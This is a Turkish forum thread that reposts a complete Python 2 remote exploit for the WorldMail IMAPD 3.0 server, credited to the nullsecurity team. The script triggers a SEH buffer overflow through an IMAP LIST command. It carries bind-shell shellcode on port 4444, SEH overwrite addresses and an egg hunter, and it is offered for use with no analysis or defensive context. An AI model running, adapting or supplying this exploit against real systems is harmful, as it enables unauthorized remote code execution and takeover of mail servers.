JavaScript devre dışı. Daha iyi bir deneyim için, önce lütfen tarayıcınızda JavaScript'i etkinleştirin.
Çok eski bir web tarayıcısı kullanıyorsunuz. Bu veya diğer siteleri görüntülemekte sorunlar yaşayabilirsiniz..
Tarayıcınızı güncellemeli veya
alternatif bir tarayıcı kullanmalısınız.
Worldmail Imapd - Seh Overflow - Remote Exploit
Konuyu Başlatan
Nulledtrxz
Başlangıç tarihi
5 Ocak 2023
<div class="bbWrapper"><div class="bbCodeBlock bbCodeBlock--screenLimited bbCodeBlock--code">
<div class="bbCodeBlock-title">
Kod:
</div>
<div class="bbCodeBlock-content" dir="ltr">
<pre class="bbCodeCode" dir="ltr" data-xf-init="code-block" data-lang=""><code>#!/usr/bin/env python
# -*- coding: latin-1 -*- # ####################################################
# ____ _ __ #
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
# /___/ nullsecurity team #
# #
# wm-imapd.py - WorldMail IMAPD remote exploit #
# #
# DATE #
# 09/01/2012 #
# #
# DESCRIPTION #
# WorldMail IMAPD - SEH overflow - remote exploit #
# #
# AUTHOR #
# TheXero - http://www.nulledtr.net #
# #
################################################################################
import sys
import socket
## Exploit Title: WorldMail imapd 3.0 SEH overflow (egg hunter)
## Tested on: XP SP3 en-us
## Author: TheXero
## Website: www.thexero.co.uk
## http://www.nullsecurity.net
## Check for parameters
if len(sys.argv) != 3:
print "Usage: " + sys.argv[0] + " 127.0.0.1 143"
quit()
## Assigns the parameters
target = sys.argv[1]
port = int(sys.argv[2])
## Sets up the socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
## Sets the variables
char = "}"
nseh = "\xeb\x06\x90\x90"
seh = "\x4e\x3b\x01\x10" ## 10013B4E |. 59 POP ECX mailcmn.dll
buffer = '\x90' * 8
shellcode = ("T00WT00W" ## Bindshell port 4444
"\xbd\xe8\x39\x05\xa5\xdb\xdb\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x56\x31\x68\x13\x03\x68\x13\x83\xc0\xec\xdb\xf0\x59\x04\x92"
"\xfb\xa1\xd4\xc5\x72\x44\xe5\xd7\xe1\x0c\x57\xe8\x62\x40\x5b"
"\x83\x27\x71\xe8\xe1\xef\x76\x59\x4f\xd6\xb9\x5a\x61\xd6\x16"
"\x98\xe3\xaa\x64\xcc\xc3\x93\xa6\x01\x05\xd3\xdb\xe9\x57\x8c"
"\x90\x5b\x48\xb9\xe5\x67\x69\x6d\x62\xd7\x11\x08\xb5\xa3\xab"
"\x13\xe6\x1b\xa7\x5c\x1e\x10\xef\x7c\x1f\xf5\xf3\x41\x56\x72"
"\xc7\x32\x69\x52\x19\xba\x5b\x9a\xf6\x85\x53\x17\x06\xc1\x54"
"\xc7\x7d\x39\xa7\x7a\x86\xfa\xd5\xa0\x03\x1f\x7d\x23\xb3\xfb"
"\x7f\xe0\x22\x8f\x8c\x4d\x20\xd7\x90\x50\xe5\x63\xac\xd9\x08"
"\xa4\x24\x99\x2e\x60\x6c\x7a\x4e\x31\xc8\x2d\x6f\x21\xb4\x92"
"\xd5\x29\x57\xc7\x6c\x70\x30\x24\x43\x8b\xc0\x22\xd4\xf8\xf2"
"\xed\x4e\x97\xbe\x66\x49\x60\xc0\x5d\x2d\xfe\x3f\x5d\x4e\xd6"
"\xfb\x09\x1e\x40\x2d\x31\xf5\x90\xd2\xe4\x5a\xc1\x7c\x56\x1b"
"\xb1\x3c\x06\xf3\xdb\xb2\x79\xe3\xe3\x18\x0c\x23\x2a\x78\x5d"
"\xc4\x4f\x7e\x70\x48\xd9\x98\x18\x60\x8f\x33\xb4\x42\xf4\x8b"
"\x23\xbc\xde\xa7\xfc\x2a\x56\xae\x3a\x54\x67\xe4\x69\xf9\xcf"
"\x6f\xf9\x11\xd4\x8e\xfe\x3f\x7c\xd8\xc7\xa8\xf6\xb4\x8a\x49"
"\x06\x9d\x7c\xe9\x95\x7a\x7c\x64\x86\xd4\x2b\x21\x78\x2d\xb9"
"\xdf\x23\x87\xdf\x1d\xb5\xe0\x5b\xfa\x06\xee\x62\x8f\x33\xd4"
"\x74\x49\xbb\x50\x20\x05\xea\x0e\x9e\xe3\x44\xe1\x48\xba\x3b"
"\xab\x1c\x3b\x70\x6c\x5a\x44\x5d\x1a\x82\xf5\x08\x5b\xbd\x3a"
"\xdd\x6b\xc6\x26\x7d\x93\x1d\xe3\x8d\xde\x3f\x42\x06\x87\xaa"
"\xd6\x4b\x38\x01\x14\x72\xbb\xa3\xe5\x81\xa3\xc6\xe0\xce\x63"
"\x3b\x99\x5f\x06\x3b\x0e\x5f\x03")
## Calculates the size of junk depending on the shellcode
junk = "\x41" * (769 - len(shellcode))
## Egg Hunter
hunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05"
"\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
## Assembles the buffer
buffer = char + junk + shellcode + nseh + seh + hunter + char
## Connects
s.connect((target,port))
data=s.recv(1024)
s.send("a001 LIST " + buffer + "\r\n")
s.close()
# EOF</code></pre>
</div>
</div></div>
